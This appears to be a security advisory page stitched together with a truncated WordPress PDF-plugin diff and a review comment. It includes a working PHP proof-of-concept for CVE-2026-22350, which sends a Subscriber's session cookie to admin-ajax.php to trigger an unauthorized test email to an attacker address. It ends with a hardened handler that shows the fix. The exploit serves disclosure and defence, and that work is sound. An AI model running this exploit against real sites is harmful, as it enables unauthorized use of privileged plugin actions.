-			$this->notices[] = sprintf( esc_html__( 'The PHP DOM Extension was not found. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+	public function check_dom()
+	{
+		if (! extension_loaded('dom') || ! class_exists('DOMDocument')) {
+			$this->notices[] = sprintf(esc_html__('The PHP DOM Extension was not found. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
-		if ( ! extension_loaded( 'libxml' ) ) {
-			$this->notices[] = sprintf( esc_html__( 'The PHP Extension libxml could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-wpforms' ), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>' );
+		if (! extension_loaded('libxml')) {
+			$this->notices[] = sprintf(esc_html__('The PHP Extension libxml could not be detected. Contact your web hosting provider to fix. %1$sGet more info%2$s.', 'pdf-for-woocommerce'), '<a href="https://pdf.add-ons.org/wordpress-pdf-activation-errors-and-how-to-fix-them/">', '</a>');
 		}
 	}
-	public function check_ram( $ram ) {
-		$memory_limit = $this->convert_ini_memory( $ram );
-		$ram = ( $memory_limit === '-1' ) ? -1 : floor( $memory_limit / 1024 / 1024 );
-		if ( $ram < 64 && $ram !== -1 ) {
-			$this->notices[] = sprintf( esc_html__( 'You need %1$s128MB%2$s of WP Memory (RAM) but we only found %3$s available. %4$sTry these methods to increase your memory limit%5$s, otherwise contact your web hosting provider to fix.', 'pdf-for-wpforms' ), '<strong>', '</strong>', $ram . 'MB', '<a href="https://pdf.add-ons.org/how-to-increase-your-wordpress-memory-limit-for-pdf/">', '</a>' );
+	public function check_ram($ram)
+	{
+		$memory_limit = $this->convert_ini_memory($ram);
+		$ram = ($memory_limit 
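Review bot: the containment check added to destroy_all_files(), `if (strpos($dirPath, $basedir) !== 0) return;`, compares against the bare uploads directory, so a path such as <basedir>-backup/ or <basedir>2/ passes because it starts with the same string; compare against trailingslashit($basedir), and resolve with realpath() first, because is_dir() follows symlinks and the recursion will descend into a symlinked directory inside the uploads folder and delete the contents of whatever it points to (test is_link($path) before recursing). In the same loop $dirPath already carries a trailing slash from trailingslashit(), so `$path = $dirPath . '/' . $item` builds paths containing '//' (harmless, but untidy), and $rand_max in maybe_add_random_dir() is still assigned and never used. In ajax_validate_api_token() the order of operations is inverted: $_POST['clientId'], clientSecret and authorizationCode are read before the `if (! isset($_POST['clientId']))` guard (undefined-index warnings on a malformed request) and before the `current_user_can('manage_options')` check; move the capability check directly after check_ajax_referer() and the isset test before the reads. The same checks should be confirmed in remove_font(), whose action is renamed here from pdfceator_remove_font to yeepdf_remove_font but whose body is outside this diff (any JS still posting the old action name will now hit an unknown action). custom_upload_mimes() enables .ttf uploads for every user with upload_files across the whole site, not just on this plugin's font screen; if that is intended, say so in the commit, and verify that WordPress's fileinfo-based type check accepts application/x-font-ttf for real TTF files before relying on it. Swapping rtrim for ltrim in maybe_get_random_dir() drops the trailing-slash normalisation, so an option value ending in '/' now yields a '//' in $dir; the added '..' rejection is the useful part of that change and should stay. As rendered here the `ltrim($uploads_folder, "/\")` literal is not a valid PHP string (the backslash escapes the closing quote); confirm the source reads "/\\". Finally, the hunk is cut off after `$ram = ($memory_limit`, so check_ram() and the remainder of the file could not be reviewed.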

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-22350 - PDF for Elementor Forms + Drag And Drop Template Builder <= 6.3.1 - Missing Authorization

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$cookie = 'wordpress_logged_in_abc=...'; // Valid auth cookie for a Subscriber user

// Prepare the POST data for the vulnerable action
$post_data = array(
    'action' => 'yeepdf_builder_send_email_testing',
    'id'     => '123', // Any post ID
    'email'  => 'attacker@example.com'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/x-www-form-urlencoded',
    'Cookie: ' . $cookie
));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check response
if ($http_code == 200 && strpos($response, 'Sent email') !== false) {
    echo "[+] Exploit successful. Test email sent.\n";
    echo "Response: $response\n";
} else {
    echo "[-] Exploit failed or endpoint not vulnerable.\n";
    echo "HTTP Code: $http_code\n";
    echo "Response: $response\n";
}
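As an added example that is neither the plugin's code nor part of the Atomic Edge PoC, the shape of an AJAX handler that closes this class of bug: the `check_ajax_referer` nonce check the patch notes describe, the capability check that was missing in CVE-2026-22350, and `wp_unslash` plus email validation before anything reaches `wp_mail`. The nonce action name `yeepdf_builder_nonce`, the POST field `nonce`, the `manage_options` capability and the mail subject/body are assumptions; the plugin's real handler (removed by the patch) is not reproduced.

```php
<?php
// Illustrative hardened handler (added example, not the plugin's code).
// Assumed: nonce action 'yeepdf_builder_nonce' arrives in POST field 'nonce',
// and 'manage_options' is the capability required to send a test email.
add_action( 'wp_ajax_yeepdf_builder_send_email_testing', 'hardened_send_email_testing' );

function hardened_send_email_testing() {
    // 1. CSRF check: dies with HTTP 403 unless a valid nonce for this action is present.
    check_ajax_referer( 'yeepdf_builder_nonce', 'nonce' );

    // 2. Authorization check, the piece the vulnerable handler lacked:
    //    a Subscriber is logged in (so the wp_ajax_ hook fires) but fails this test.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Unslash and sanitize untrusted POST input before using it.
    $id    = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    $email = isset( $_POST['email'] ) ? sanitize_email( wp_unslash( $_POST['email'] ) ) : '';

    if ( ! $id || ! get_post( $id ) ) {
        wp_send_json_error( array( 'message' => 'Unknown template ID.' ), 400 );
    }
    if ( ! is_email( $email ) ) {
        wp_send_json_error( array( 'message' => 'Invalid email address.' ), 400 );
    }

    // 4. Only after every check passes is the privileged action performed.
    $subject = sprintf( '[%s] PDF template test', get_bloginfo( 'name' ) ); // assumed subject
    $body    = sprintf( 'Test email for template #%d.', $id );               // assumed body
    $sent    = wp_mail( $email, $subject, $body );

    if ( ! $sent ) {
        wp_send_json_error( array( 'message' => 'wp_mail failed.' ), 500 );
    }
    wp_send_json_success( array( 'message' => 'Sent email' ) );
}
```

With these checks in place, the PoC request above (valid Subscriber cookie, no nonce) is rejected at step 1 and, even with a nonce, at step 2.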
